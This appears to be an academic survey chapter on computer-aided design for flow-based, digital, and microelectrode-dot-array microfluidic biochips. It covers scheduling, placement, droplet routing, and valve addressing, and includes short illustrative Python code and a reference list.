The road toward large-scale integration that microfluidics has taken closely resembles the early development of integrated circuits. As the available on-
chip resources became unmanageable, CAD tools were introduced to improve
productivity, eventually creating an electronic design automation (EDA) industry
for integrated circuits. For microfluidic biochips, however, this systematic design
automation is yet to come. To realize a complete automation flow for biochip design
and thereby promote the development of an EDA industry for microfluidics, a large
amount of work on the design automation of microfluidic biochips has been carried
out over the past decade (Chakrabarty et al. 2010; Huang et al. 2019a, 2021a,b;
Ibrahim et al. 2018a; Liu et al. 2021; Tseng et al. 2013). With these pioneering
research, on the one hand, design tasks can be offloaded from researchers and
engineers in biology and biochemistry. On the other hand, new chip architectures
are explored automatically to open new doors to designers to meet requirements
from future large-scale biological experiments and medical diagnoses. In this
chapter, the authors describe three prominent microfluidic architectures: flow-based
microfluidic biochips, digital microfluidic biochips, and microelectrode-dot-array
(MEDA) biochips. The authors also describe computer-aided design (CAD) tools
for the automated synthesis and optimization of biochips from bioassay protocols.
Recent advances in modeling and simulation, fluidic-operation scheduling, module
placement, physical design, and dynamic reconfiguration are also presented.
Fig. 1 (a) Schematic of a flow-based microfluidic biochip, (b) front view of (a), (c) structure of
a rotary mixer, and (d) structure of a fully programmable valve array. (Adapted from Fidalgo and Maerkl 2011)
valves are deployed at each flow-channel (wide channels in blue color) crossing,
so that variable interconnections and arbitrary channel structures can be imple-
mented. Correspondingly, biochemical operations can be performed automatically
by opening and closing a set of valves, and bioassays can be completed efficiently
by configuring different functionality modules on this architecture.
As manufacturing technologies advance, the characteristic dimensions of FBMBs keep shrinking. The feature size of valves has been reduced significantly from 15 × 15 μm² to 6 × 6 μm² (Araci and Quake 2012). Tens of thousands of valves can be integrated into a chip smaller than a coin (Araci and Quake 2012), and the design of biochips has become much more complex in order to achieve the desired functions. A 96 × 96 dynamic array developed by Fluidigm Inc., for example, can run 9,216 parallel polymerase chain reactions (PCR), but it requires more than 25,000 valves to realize the various fluidic manipulations (Perkel 2008). Consequently, traditional manual design, which is time-consuming and error-prone, is no longer suitable. The lack of CAD tools not only prolongs the development cycle of microfluidic products but also hinders their large-scale integration. These new challenges call for an automated design and integration solution.
The automation flow of FBMBs includes several design tasks, e.g., allocating
necessary devices for bioassay execution and chip control, computing exact on-
chip locations for these devices, constructing efficient connections among them,
etc. The results of these tasks determine the chip architecture and thus the final chip
performance. In this section, the authors introduce the design tasks of architectural synthesis in both the control and flow layers.
Fig. 2 Architectural synthesis framework of FBMBs. (Adapted from Yao et al. 2015). (a)
Sequencing graph of PCR, (b) binding and scheduling scheme, (c) placement and routing solution
in the flow layer, (d) positions of valves, (e) valve-addressing solution, and (f) routing solution in
the control layer
• High-level synthesis: The major goals of this stage are: (i) to find a binding solution φ : O → D such that every operation in the sequencing graph is bound to a specific device for execution, and (ii) to compute a scheduling scheme such that all operations complete efficiently while satisfying the specified dependencies (a toy scheduling sketch is given after this list). Figure 2b shows a binding and scheduling scheme for the PCR described in Fig. 2a, where 4 mixers are allocated to execute operations. For example, operations o1–o4 are bound to devices M1–M4, respectively, and executed concurrently in the time interval between 0 and t1. The complete assay finishes at time point t5, after the execution of o7 on device M3.
• Physical design: With the generated binding and scheduling scheme, physical
design is performed to assign the allocated devices to exact locations on the
chip while establishing efficient connections among them. Typical optimization
objectives in this stage include short length of flow channels, small chip area, few
channel crossings, etc. For example, Fig. 2c shows a chip layout corresponding to
the scheduling described in Fig. 2b, where flow ports and waste ports are placed
at the boundary of the chip to inject fluid samples and recover waste fluids,
respectively. In addition, the total length of flow channels and the number of
channel crossings have been minimized to reduce fabrication cost of the chip.
• Valve addressing: The density of valves integrated into a single biochip has increased significantly over the past decade – up to 1 million valves/cm² (Araci and Quake 2012) – leading to a rapid increase in the number of control ports. These ports occupy extra chip area and need to be connected to external pressure sources, thus increasing the fabrication cost and the complexity of the control system significantly. To solve this problem, valve addressing groups valves that can be actuated in a compatible manner and assigns each group a shared control port. Figure 2d shows the positions of the valves in the chip layout of Fig. 2c. By computing the switching patterns of these valves at each time step, the compatibility among them can be identified. In the grouping solution shown in Fig. 2e, valves that are connected together can be actuated by the same control port.
• Control-channel routing: With an optimized valve-addressing solution, routing of the control channels is then performed to connect the valves in each group to their control port. Figure 2f shows the routing result corresponding to Fig. 2e. In this architecture, control ports are placed at the edges of the control layer to reduce design complexity; note, however, that control ports can in principle be placed anywhere on the chip. Optimization goals in this stage typically include short control channels, synchronized valve actuation, short pattern-setup time for the control signals, etc.
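As referenced in the high-level synthesis task above, the following toy list scheduler illustrates binding and scheduling on a PCR-like sequencing graph; the operation durations and the greedy earliest-free-mixer policy are illustrative stand-ins for the ILP and heuristic formulations used in the literature.

```python
# Toy list scheduler for a sequencing graph: ops become ready when all
# predecessors finish, and each ready op is bound to the earliest-free mixer.
ops = {"o1": [], "o2": [], "o3": [], "o4": [],          # op -> predecessors
       "o5": ["o1", "o2"], "o6": ["o3", "o4"], "o7": ["o5", "o6"]}
duration = {op: 1.0 for op in ops}                      # illustrative mixing times
mixers = {"M1": 0.0, "M2": 0.0, "M3": 0.0, "M4": 0.0}   # device -> time it frees up

finish, schedule = {}, []
while len(finish) < len(ops):
    for op, preds in ops.items():
        if op in finish or any(p not in finish for p in preds):
            continue                                    # not ready yet
        ready = max([finish[p] for p in preds], default=0.0)
        dev = min(mixers, key=mixers.get)               # earliest-free mixer
        start = max(ready, mixers[dev])
        finish[op] = mixers[dev] = start + duration[op]
        schedule.append((op, dev, start, finish[op]))

for rec in schedule:
    print(rec)   # e.g., ('o1', 'M1', 0.0, 1.0) ... ('o7', 'M3', 2.0, 3.0)
```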
In this section, the corresponding design methods for both control and flow layers
are discussed.
Synthesis Methods for the Flow Layer
Many design automation methods have recently been proposed for the flow-layer architectural synthesis of FBMBs (Huang et al. 2019a, 2021a,b, 2022; Ibrahim et al. 2018a; Liu et al. 2021; Tseng et al. 2013). These synthesis tools
adopt various optimization techniques, including integer linear programming (ILP),
particle swarm optimization (PSO), A*-search algorithm, etc., to systematically
solve the problems described in section “Architecture Design of the Flow Layer,”
thus generating biochip architectures with both high efficiency and low cost.
Fig. 3 Storage architectures of FBMBs: (a) dedicated storage accessed through a multiplexing structure and (b) channel-storage architecture in which fluids are cached directly in flow channels
The dedicated storage shown in Fig. 3a suffers from several limitations, e.g., constrained capacity, fixed position, and large area
occupation. Moreover, the multiplexing structure in Fig. 3a allows only one fluid to
enter/leave the storage at a time, thus limiting its access bandwidth. In contrast,
fluids can be cached directly in flow channels in a channel-storage architecture
as illustrated in Fig. 3b. This can be viewed as distributing the storage units in a
dedicated storage to the chip plane, leading to an “on-the-spot” fluid store/fetch with
higher efficiency. Accordingly, Liu et al. (2021) presents an ILP-based methodology
to automatically generate chip layouts with channel storage. In Huang et al. (2021a),
a fast heuristic is proposed to efficiently compute optimized channel-storage archi-
tectures while removing the contaminants left behind in channels/devices during the
execution of bioassays. In particular, the work in Ibrahim et al. (2018a) presents an
efficient synthesis flow called CoSyn to generate a hybrid microfluidic platform that
enables complete single-cell analysis on a heterogeneous pool of cells.
More recently, a synthesis flow named PathDriver+ has been proposed by taking
the actual fluid manipulations into account (Huang et al. 2021b). For example, when
loading fluid samples into a device, to ensure correct execution of the operation,
the air already present should be completely pushed out of the device. Meanwhile,
the air used for driving the movement of fluids should not enter the device. This constraint, consequently, requires strict volume control of the input fluids.
Figure 4 describes an example of failure in volume control, where the two fluids
that need to be mixed are separated due to insufficient input volumes. In contrast,
in Fig. 5, volumes of the two input fluids are increased to ensure that no extra
air is kept inside the mixer, leading to excess fluids left behind in flow channels.
Accordingly, PathDriver formulates the constraints above into an ILP model and
constructs flow paths for both fluid transportation and excess fluid removal, leading
to chip architectures with volume management.
Besides the complete synthesis flows above, there are a number of automation
solutions for solving the local optimizations in the flow-layer design (Lin et al.
2014; Yang et al. 2018; Wang et al. 2016; Grimmer et al. 2017; Crites et al. 2017;
Huang et al. 2019b; Li et al. 2016; Lai et al. 2018). For example, the methods
in Lin et al. (2014) and Yang et al. (2018) are proposed to deal specifically with
the channel routing problem, so that the total length of flow channels can be
minimized. Specifically, Lin et al. (2014) adopts the obstacle-avoiding rectilinear
Steiner tree model to construct a flow-channel network with minimized total channel
length. Similar to the X-/octilinear architecture implemented in integrated circuits,
in Yang et al. (2018), the traditional Manhattan channels with 90° bends are replaced
by a routing strategy with any-angle bends, thus fundamentally increasing the
routing flexibility. The methods in Wang et al. (2016), Grimmer et al. (2017),
Fig. 5 Snapshots of fluid manipulations when performing the mixing operation. (Adopted from
Urbanski et al. 2007). (a) Loading the first fluid flow, (b) removing the excess fluids in (a), (c)
loading the second fluid flow and starting the mixing operation, and (d) recovering the resulting
mixture and removing the excess fluids in (c)
Crites et al. (2017), and Huang et al. (2019b) are put forward to find optimized
physical design solutions, so that key indicators such as chip area, channel length,
and channel crossings can be minimized simultaneously. The method in Li et al.
(2016) is proposed to compute optimized binding and scheduling schemes such that
the completion time of bioassays is minimized. The synthesis methods in Lai et al.
(2018) are proposed to solve the dynamic mapping and fluidic routing problems in fully programmable valve array (FPVA) biochips. Moreover, in Tseng et al. (2016), a valve-role-changing concept is proposed to improve the reliability of FPVA biochips through two major techniques: (1) valve actuation activities are distributed evenly across the chip, and (2) the maximum number of actuations of any single valve is minimized.
Qualitative comparisons among different flow-layer architecture design methods
are presented in Table 2.
Fig. 6 Structure of a multiplexer with three control channels. (Adopted from Zhu et al. 2019)
Synthesis Methods for the Codesign of the Control and Flow Layers
As mentioned before, control and flow layers interact with each other through
valves, which therefore implies that the control-layer design is closely related to
the synthesis solution of the flow layer. For example, a chip layout with plenty of
channel crossings gathered in a specific region in the flow layer would harm the
routability of control channels and may even result in design failure of the control
layer. The synthesis methods discussed in sections “Synthesis Methods for the Flow
Layer” and “Synthesis Methods for the Control Layer,” on the other hand, can
generate optimized layout solutions for either the control or flow layer, but they
neglect the layer interactions to varying degrees and design each layer separately,
leading to a gap between the two layers. Accordingly, another set of automation
methods that handles the design of control and flow layers jointly has recently been
proposed (Yao et al. 2015; Tseng et al. 2017, 2019).
The work in Yao et al. (2015) puts forward the first flow-control codesign
methodology that seamlessly integrates the design stages in both layers. The core
technique adopted in this method is a placement adjustment algorithm, which
iteratively refines positions of devices in the flow layer based on the feedback
information from control- and flow-layer routing stages. With this iterative feedback
tuning, congestions in both layers can be eliminated, and the overall solution quality
can be improved significantly.
In particular, a co-layout synthesis tool suite named Columba has recently
been proposed to bridge the design gap between control and flow layers (Tseng
et al. 2017, 2019). These tools have received considerable attention in both EDA
and microfluidic communities, due to their advantages in dealing with large-scale
designs with complex layer interactions. A major feature of Columba is its fully automated, cloud-based design flow:
Fig. 7 Design specification of kinase activity application and the corresponding biochip synthe-
sized by Columba. (Adopted from Tseng et al. 2017)
With the proposed Columba tool suite, users with different backgrounds only need to upload a high-level specification describing their design requests to the cloud server, and a customized, manufacturing-ready design solution is returned automatically within minutes.
Digital Microfluidic Biochips
Fig. 10 (a) Top view of a DMFB (Liang et al. 2020). Two droplets are present on the biochip. (b) Illustration of the side view of a DMFB. The droplet is moved to the right using EWOD
Applying a voltage to the electrode adjacent to a droplet changes the wettability of the surface and hence the interfacial tension under that side of the droplet; this interfacial tension gradient forces the droplet to move toward the right.
A filler medium such as silicone oil is used between the two plates to avoid fluid
evaporation and reduce the likelihood of cross-contamination between samples.
Today’s DMFBs can also be integrated with sensors and intelligent cyberphysical
control (Luo et al. 2012).
Because of the precise control over microfluidic operations, DMFBs are
employed by microbiologists and biomedical engineers to seamlessly process
several biomolecular reaction steps without bulky instrumentation. DMFBs
have been demonstrated to handle complicated applications such as cell
biology (Lamanna et al. 2020), point-of-care diagnostics (Sista et al. 2020), and
air monitoring (Huang et al. 2020). One such example, a DMFB system for the detection of inorganic ions in aerosols, is shown in Fig. 12.
Fig. 12 DMFB system for the detection of inorganic ions in aerosols (Huang et al. 2020)
Synthesis Methods
Fig. 13 An example illustrating high-level synthesis for a digital microfluidic biochip. (Adopted
from Chakrabarty et al. 2010)
Droplet Routing
The problem of determining paths of droplet transportation between modules is
referred to as droplet routing. The dynamic reconfigurability inherent in digital
microfluidics allows different droplet routes to share cells on the microfluidic
array during different time intervals. Several systematic routing methods for digital
microfluidic biochips have therefore been developed to minimize the number of
cells used for droplet routing while satisfying constraints imposed by performance
goals and fluidic properties (Liang et al. 2020; Huang et al. 2009; Su et al. 2006; Xu
and Chakrabarty 2007).
One of the first methods for droplet routing in biochips was proposed in Su
et al. (2006). The main objective in routing is to find droplet routes with minimum
lengths, where route length is measured by the number of cells in the path from the
starting point to the destination. For a microfluidic array of fixed size, minimum-
length droplet routes lead to the minimization of the total number of cells used in
droplet routing, thus freeing up more spare cells for fault tolerance.
Droplet routing should be considered in the synthesis flow for digital microfluidics in order to ensure that the synthesized design is routable, i.e., that feasible routing paths exist. The work in Xu and Chakrabarty (2007) proposed a method to incorporate droplet routability in the parallel recombinative simulated annealing (PRSA)-based synthesis flow. This method
estimates the droplet routability using two metrics. It adopts the average module
distance (over all interdependent modules) as the first design metric to guarantee
the routability of modules in the synthesized biochip. It also adopts the maximum
module distance as the second design metric to approximate the maximum length
of droplet manipulation.
Since synthesis results with high routability values are more likely to lead to
simple and efficient droplet pathways, this method incorporates the above two
metrics into the fitness function by a factor that can be fine-tuned according to
different design specifications to control the PRSA-based procedure. Candidate
designs with low routability are discarded during evolution. Thus, the synthesis
procedure guarantees that the routing complexity is reduced for the synthesized
biochip while meeting constraints on array size and bioassay processing time.
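As an illustration of how the two routability metrics could enter a PRSA-style fitness function, consider the sketch below; the placement, the distance measure, and the weights alpha and beta are hypothetical, and the exact formulation in Xu and Chakrabarty (2007) differs.

```python
# Routability-aware fitness sketch for a candidate placement.
# Modules are placed at (x, y) cell coordinates; 'flows' lists pairs of
# interdependent modules between which droplets must be routed.
def fitness(placement, flows, assay_time, alpha=1.0, beta=0.5):
    def dist(a, b):  # Manhattan distance between two module positions
        (xa, ya), (xb, yb) = placement[a], placement[b]
        return abs(xa - xb) + abs(ya - yb)

    dists = [dist(a, b) for a, b in flows]
    avg_dist = sum(dists) / len(dists)   # first routability metric
    max_dist = max(dists)                # second routability metric
    # Lower completion time and shorter (easier) routes -> higher fitness.
    return 1.0 / (assay_time + alpha * avg_dist + beta * max_dist)

placement = {"mix1": (0, 0), "mix2": (4, 1), "detect": (2, 5)}
flows = [("mix1", "mix2"), ("mix2", "detect")]
print(fitness(placement, flows, assay_time=20.0))
```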
However, the above methods are static, and they neglect the fact that droplet
transportation may fail if the electrodes associated with the routing path degrade
over time. Recently, the work in Liang et al. (2020) proposed a real-time routing
method that can capture the underlying health conditions of electrodes and provide
reliable routing pathways. This work casts droplet transportation as a reinforcement
learning problem. In the RL framework, a deep neural network is first trained
to learn a reliable policy for droplet routing. Next, the network is loaded on a
cyberphysical DMFB, where it can observe the health condition of the electrodes.
The experimental results showed that even though electrodes on a DMFB degrade
over time, the RL droplet router can learn the degradation behavior and transport
droplets using only healthy electrodes. This approach extends the useful lifespan of a biochip and allows a wide range of bioassays to be adapted to the DMFB platform.
MEDA Biochips
Hardware Implementation
On a DMFB device, tiny droplets are manipulated based on the principle of EWOD.
A conventional DMFB generally contains two layers: (1) the bottom layer contains a two-dimensional array of electrodes, and (2) the top layer acts as a ground electrode. Between the droplet and the electrodes in the bottom layer, there is a hydrophobic layer. With this hydrophobic layer in place, the contact angle θ becomes smaller when the electrode is activated, and a smaller value of θ indicates a stronger EWOD force; the hydrophobic layer therefore serves to increase the EWOD force. To move a droplet, a high voltage is applied to an adjacent electrode while the electrode under the droplet is deactivated. Because the droplet attains a lower energy over the high-voltage electrode, a net force drags it toward that electrode. By applying various voltage patterns to the electrodes, droplet splitting, mixing, and dispensing operations can be implemented.
Compared with conventional DMFB biochips, MEDA biochips offer more
flexibility. A conventional DMFB and a MEDA biochip are illustrated in Fig. 14.
The basic unit of MEDA is a microelectrode cell (MC). It contains a microelectrode,
an activation circuit, and a sensing circuit. A high voltage (HV) of around 25 V is
applied to the top plate of the MEDA biochip (Lai et al. 2015b).
Based on the actuation and sensing circuit under the microelectrode, three functions can be implemented in an MC: droplet dragging, droplet holding, and
droplet sensing. The block diagrams of the actuation and sensing circuit under each
MC are shown in Fig. 15 and described below:
Fig. 14 The construction of (a) a conventional DMFB biochip and (b) the MEDA biochip.
(Adapted from Li et al. 2018)
For droplet sensing, the microelectrode is charged to a certain voltage. With a fixed target voltage, the charging time depends on the capacitance between the top plate and the microelectrode; therefore, a droplet can be detected based on the small increase in charging time.
Fig. 15 Illustration of the actuation and sensing circuit under each MC. (Adopted from Lai et al.
2015b)
Fig. 16 (a) Example illustration; (b) silicone oil position readback; (c) droplet position readback;
(d) 2D scanning image
MEDA Evolution
Fig. 17 Evolution of MEDA biochips: (a) the first generation (Wang et al. 2011), (b) the second
generation (Lai et al. 2015b), and (c) the third generation (Lai et al. 2015a)
The improvements of the second-generation MEDA biochip (Fig. 17b) are as follows: (1) droplet-location sensing is included, and the “2D location
map” is visible in a custom user interface, (2) droplet-property sensing (i.e., dielec-
tric constant) can also be measured with the integrated high-sensitivity capacitance
readout circuit, and (3) the controlling circuit is fully integrated, so this biochip is
fully automated.
The third-generation MEDA biochip was fabricated in 2015; see Fig. 17c. Its
functionality is the same as the second generation, but it significantly improves the
performance of some key building blocks: (1) The on/off state of a microelectrode
is controlled by an MOS switch. The breakdown voltage of the MOS switch is
25 V, while it is only 14.5 V in the second-generation MEDA biochip. With a higher breakdown voltage, a higher actuation voltage can be applied to a microelectrode, so droplets can be manipulated more efficiently. (2) The droplet-location
sensing circuit achieves a resolution of 1.3 fF, while the resolution is only 5 fF in
the second generation. According to the analysis and experimental results reported
in Lai et al. (2015a), the third-generation MEDA biochip achieves over 40%
improvement in power consumption and operation time compared to the second-
generation biochip.
Synthesis Methods
This section describes recent synthesis work specific to MEDA biochips.
Reservoir Placement
Fig. 18 Unified synthesis flow for MEDA biochips (Li et al. 2017)
Fig. 19 A droplet undergoing transport on a MEDA biochip: (a) side view and (b) top view
(Li et al. 2017)
Fig. 20 Illustration of the module reshaping during placement (Chung et al. 2018)
Chen et al. (2011) also incorporated other MEDA-specific characteristics, e.g., diag-
onal movements and channel-based movements. The work in Howladar et al. (2016)
proposed a MEDA-based cross-reference driving scheme and routing algorithm that
allow simultaneous driving of multiple droplets. The objectives of these methods include reducing crossovers through intelligent collision avoidance, minimizing the overall routing time, and minimizing the control pin count. The work in
Li et al. (2017) also proposed a modified Lee-based routing algorithm specific for
MEDA biochips. A typical Lee algorithm includes four steps: initialization, wave
propagation, backtrace, and clearance. Initialization aims to create routing grids and
identify the source and the sink. The next step, wave propagation, progressively fills
the adjacent grids with marks based on the distance of the wave front from the source
to the sink. Based on the tracing information, backtrace determines the shortest path
from the sink to the source. The last step, clearance, deletes all marks and preserves
the shortest path. In Li et al. (2017), the Lee algorithm is adopted to consider the
size and shape of different droplets on a MEDA biochip. In order to incorporate the
diagonal droplet transportation (Wang et al. 2011), the distance “wave” can also be
propagated diagonally. Note that the droplet shape can be modified during droplet
transportation (Wang et al. 2011). Droplet shape morphing during droplet routing
is used for avoiding conflict with other droplets or executing fluidic modules; the
droplet shape can be restored when there is no conflict. Therefore, droplet shapes
as well as the relative distance should be recorded in the step of wave propagation.
After the wave propagation is completed, the shortest droplet route can be backtraced from the sink to the source.
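The following is a minimal sketch of such a Lee-style router on a grid, using 8-directional wave propagation to mimic the diagonal droplet transport supported by MEDA; the grid, obstacles, and endpoints are made up, and the droplet-shape bookkeeping described above is omitted.

```python
from collections import deque

# Lee-style maze router: BFS wave propagation (8 directions, since MEDA
# supports diagonal droplet transport), then backtrace from sink to source.
def lee_route(rows, cols, obstacles, source, sink):
    steps = [(dr, dc) for dr in (-1, 0, 1) for dc in (-1, 0, 1)
             if (dr, dc) != (0, 0)]
    dist = {source: 0}
    frontier = deque([source])
    while frontier:                       # wave propagation
        cell = frontier.popleft()
        if cell == sink:
            break
        r, c = cell
        for dr, dc in steps:
            nxt = (r + dr, c + dc)
            if (0 <= nxt[0] < rows and 0 <= nxt[1] < cols
                    and nxt not in obstacles and nxt not in dist):
                dist[nxt] = dist[cell] + 1
                frontier.append(nxt)
    if sink not in dist:
        return None                       # no route exists
    path = [sink]                         # backtrace: follow decreasing marks
    while path[-1] != source:
        r, c = path[-1]
        path.append(min(((r + dr, c + dc) for dr, dc in steps
                         if (r + dr, c + dc) in dist),
                        key=dist.get))
    return path[::-1]                     # clearance keeps only this path

print(lee_route(5, 5, obstacles={(1, 1), (2, 1), (3, 1)},
                source=(2, 0), sink=(2, 4)))
```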
The work in Lu et al. (2018) proposed a multi-level hierarchical approach that
can take appropriate decisions on droplet splitting and reshaping. Figure 23 shows
the overview of the proposed algorithm, which includes a top-down uncoarsening
followed by a bottom-up coarsening. In the uncoarsening stage, a non-splitting
reshaping-driven detailed routing (NRDR) algorithm was proposed to reshape
droplets during droplet transportation. The reshaping decisions are guided by a
proposed global droplet router. In the coarsening stage, an algorithm based on
bipartite matching was proposed to select the best splitting type to split the droplets that failed in the uncoarsening stage.
The work in Keszocze et al. (2017) proposed the first exact droplet routing
technique that is capable of handling various MEDA-specific routing characteristics,
such as droplet morphing and diagonal droplet transportation. At the same time, the
optimal routing results can be guaranteed. The proposed method transformed the
considered routing problem into a sequence of decision problems. Each decision
problem is then symbolically formulated as a satisfiability modulo theories (SMT) instance which, afterward, is passed to an SMT solver. Satisfiability (SAT) is a fundamental
Conclusion
References
10xgenomics (2020). https://www.10xgenomics.com/, last accessed: August 11, 2020
Araci IE, Quake SR (2012) Microfluidic very large scale integration (mVLSI) with integrated
micromechanical valves. Lab Chip 12(16):2803–2806
Chakrabarty K, Fair RB, Zeng J (2010) Design tools for digital microfluidic biochips: toward
functional diversification and more than moore. IEEE Trans Comput-Aided Des Integr Circuits
Syst 29(7):1001–1017
Chen Z, Teng DH-Y, Wang GC-J, Fan S-K (2011) Droplet routing in high-level synthesis of
configurable digital microfluidic biochips based on microelectrode dot array architecture.
BioChip J 5(4):343–352
Chen Y-H, Hsu C-L, Tsai L-C, Huang T-W, Ho T-Y (2013) A reliability-oriented placement
algorithm for reconfigurable digital microfluidic biochips using 3-D deferred decision making
technique. IEEE Trans Comput-Aided Des Integr Circuits Syst 32(8):1151–1162
Cho M, Pan DZ (2008) A high-performance droplet routing algorithm for digital microfluidic
biochips. IEEE Trans Comput-Aided Des Integr Circuits Syst (TCAD) 27(10):1714–1724
Chung W-C, Cheng P-Y, Li Z, Ho T-Y (2018) Module placement under completion time
uncertainty in micro-electrode-dot-array digital microfluidic biochips. IEEE Trans Multi-Scale
Comput Syst 4(4):811–821
Crites B, Kong K, Brisk P (2017) Diagonal component expansion for flow-layer placement of flow-based microfluidic biochips. ACM Trans Emb Comput Syst 16(5s):1–18
FDA advisors approve of Baebies SEEKER analyzer for newborns (2016). Available at https://
www.baebies.com/fda-advisors-back-approval-baebies-seeker-analyzer-newborns/.
FDA advisors back approval of Baebies’ SEEKER analyzer for newborns (2020). http://baebies.
com/fda-advisors-back-approval-baebies-seeker-analyzer-newborns, last accessed: August 8,
2020
FDA advisors approve of Baebies SEEKER 1.5 for SARS-CoV-2 test (2021). Available at https://
baebies.com/products/sars-cov-2-rt-pcr-test/
Fidalgo LM, Maerkl SJ (2011) A software-programmable microfluidic device for automated
biology. Lab Chip 11(9):1612–1619
Fluidigm (2020). https://www.fluidigm.com/, last accessed: August 8, 2020
Genmark dx (2020). https://www.genmarkdx.com/, last accessed: August 8, 2020
Grimmer A, Wang Q, Yao H, Ho T-Y, Wille R (2017) Close-to-optimal placement and routing
for continuous-flow microfluidic biochips. In: Proceedings of Asia and South Pacific Design
Automation Conference, pp 530–535
Hengxin bio (2020). http://www.hengxinbio.com/en/index.aspx, last accessed: August 8, 2020
Howladar P, Roy D, Roy P, Rahaman H (2016) Cross-reference EWOD driving scheme and cross-
contamination aware net placement technique for MEDA based DMFBs. In: Proceedings of
IEEE International Conference on Advances in Computing, Communications and Informatics
(ICACCI), pp 614–619
Huang T-W, Lin C-H, Ho T-Y (2009) A contamination aware droplet routing algorithm for
digital microfluidic biochips. In: 2009 IEEE/ACM International Conference on Computer-
Aided Design-Digest of Technical Papers. IEEE, pp 151–156
Huang X, Ho T-Y, Guo W, Li B, Schlichtmann U (2019a) MiniControl: synthesis of continuous-
flow microfluidics with strictly constrained control ports. In: Proceedings of Design Automation
Conference, vol 145, pp 1–6
Liu C, Huang X, Li B, Yao H, Pop P, Ho T-Y, Schlichtmann U (2021) DCSA: distributed channel-
storage architecture for flow-based microfluidic biochips. IEEE Trans Comput-Aided Des Integr
Circuits Syst 40(1):115–128
Lu G-R, Bhattacharya BB, Ho T-Y, Chen H-M (2018) Multi-level droplet routing in active-
matrix based digital-microfluidic biochips, In: Proceedings of Asia and South Pacific Design
Automation Conference (ASP-DAC), pp 46–51
Luo Y, Chakrabarty K, Ho T-Y (2012) Dictionary-based error recovery in cyberphysical digital-
microfluidic biochips. In: IEEE/ACM International Conference on Computer-Aided Design
(ICCAD), 2012, pp 369–376
Luo Y, Bhattacharya BB, Ho T-Y, Chakrabarty K (2015) Design and optimization of a cyberphysical digital-microfluidic biochip for the polymerase chain reaction. IEEE Trans Comput-Aided Design Integr Circuits Syst 34(1):29–42
Minhass WH, Pop P, Madsen J, Ho T-Y (2013) Control synthesis for the flow-based microfluidic
large-scale integration biochips. In: Proceedings Asia and South Pacific Design Automation
Conference, pp 205–212
Najjar D, Rainbow J, Sharma Timilsina S, Jolly P, De Puig H, Yafia M, Durr N, Sallum H, Alter G,
Li JZ et al (2022) A lab-on-a-chip for the concurrent electrochemical detection of SARS-CoV-2
RNA and anti-SARS-CoV-2 antibodies in saliva and plasma. Nat Biomed Eng 6(8):968–978
NOWDiagnostics (2020). https://nowdx.com/, last accessed: August 8, 2020
O’neal K, Grissom D, Brisk P (2017) Resource-constrained scheduling for digital microfluidic
biochips. ACM J Emerg Technol Comput Syst (JETC) 14(1):7
Perkel JM (2008) Life science technologies: microfluidics bringing new things to life science.
Science 322(5903):975–977
Ricketts AJ, Irick K, Vijaykrishnan N, Irwin MJ (2006) Priority scheduling in digital microfluidics-
based biochips. In Proceedings of the Conference on Design, Automation and Test in Europe
(DATE), pp 329–334
Schneider A, Pop P, Madsen J (2018) Pin-count reduction for continuous flow microfluidic
biochips. Microsyst Technol 24(1):483–494
Sista RS, Ng R, Nuffer M, Basmajian M, Coyne J, Elderbroom J, Hull D, Kay K, Krishnamurthy
M, Roberts C et al (2020) Digital microfluidic platform to maximize diagnostic tests with low
sample volumes from newborns and pediatric patients. Diagnostics 10(1):21
Su F, Chakrabarty K (2005) Unified high-level synthesis and module placement for defect-tolerant
microfluidic biochips. In: Proceedings of the Design Automation Conference (DAC), pp 825–
830
Su F, Chakrabarty K (2006) Module placement for fault-tolerant microfluidics-based biochips.
ACM Trans Des Autom Electr Syst (TODAES) 11(3):682–710
Su F, Chakrabarty K (2008) High-level synthesis of digital microfluidic biochips. ACM J Emerg
Technol Comput Syst (JETC) 3(4):1–32
Su F, Hwang W, Chakrabarty K (2006) Droplet routing in the synthesis of digital microfluidic biochips. In: Proceedings of DATE, vol 1, pp 1–6
Tseng K-H, You S-C, Liou J-Y, Ho T-Y (2013) A top-down synthesis methodology for flow-
based microfluidic biochips considering valve-switching minimization. In: Proceedings of the
International Symposium on Physical Design, pp 123–129
Tseng T-M, Li B, Schlichtmann U, Ho T-Y (2015) Storage and caching: synthesis of flow-based
microfluidic biochips. IEEE Des Test 32(6):69–75
Tseng T-M, Li B, Li M, Ho T-Y, Schlichtmann U (2016) Reliability-aware synthesis with dynamic
device mapping and fluid routing for flow-based microfluidic biochips. IEEE Trans Comput-
Aided Design Integr Circuits Syst 35(12):1981–1994
Tseng T-M, Li M, Freitas DN, McAuley T, Li B, Ho T-Y, Araci IE, Schlichtmann U (2018) Columba 2.0: a co-layout synthesis tool for continuous-flow microfluidic biochips. IEEE Trans Comput-Aided Des Integr Circuits Syst 37(8):1588–1601
Tseng T-M, Li M, Zhang Y, Ho T-Y, Schlichtmann U, Cloud Columba: accessible design
automation platform for production and inspiration. In: Proceedings of International Conference
Computer-Aided Design, pp 1–6
Urbanski JP, Thies W, Rhodes C, Amarasinghe S, Thorsen T (2006) Digital microfluidics using soft lithography. Lab Chip 6(1):96–104
Urbanski J, Thies B, Amarasinghe S, Thorsen T (2007) Programmable microfluidics. [Online]. Available: http://groups.csail.mit.edu/cag/biostream/
Wang G, Teng D, Fan S-K (2011) Digital microfluidic operations on micro-electrode dot array
architecture. IET Nanobiotechnol 5(4):152–160
Wang Q, Ru Y, Yao H, Ho T-Y, Cai Y (2016) Sequence-pair-based placement and routing for
flow-based microfluidic biochips. In: Proceedings of Asia and South Pacific Design Automation
Conference, pp 587–592
Wang Q, Xu Y, Zuo S, Yao H, Ho T-Y, Li B, Schlichtmann U, Cai Y (2017) Pressure-aware
control layer optimization for flow-based microfluidic biochips. IEEE Trans Biomed Circuits
Syst 11(6):1488–1499
Wu J-L, Li KS-M, Li J-D, Wang S-J, Ho T-Y (2018) SOLAR: simultaneous optimization of
control-layer pins placement and channel routing in flow-based microfluidic biochips. In:
Proceedings of International Symposium VLSI Design Automation Test, pp 1–4
Xu T, Chakrabarty K (2007) Integrated droplet routing in the synthesis of microfluidic biochips.
In: Proceedings of Design Automation Conference, pp 948–953
Yang K, Yao H, Ho T-Y, Xin K, Cai Y (2018) AARF: any-angle routing for flow-based microfluidic
biochips. IEEE Trans Comput-Aided Des Integr Circuits Syst 37(12):3042–3055
Yao H, Wang Q, Ru Y, Cai Y, Ho T-Y (2015) Integrated flow-control codesign methodology for
flow-based microfluidic biochips. IEEE Des Test 32(6):60–68
Yao H, Ho T-Y, Cai Y (2015) PACOR: practical control-layer routing flow with length-matching
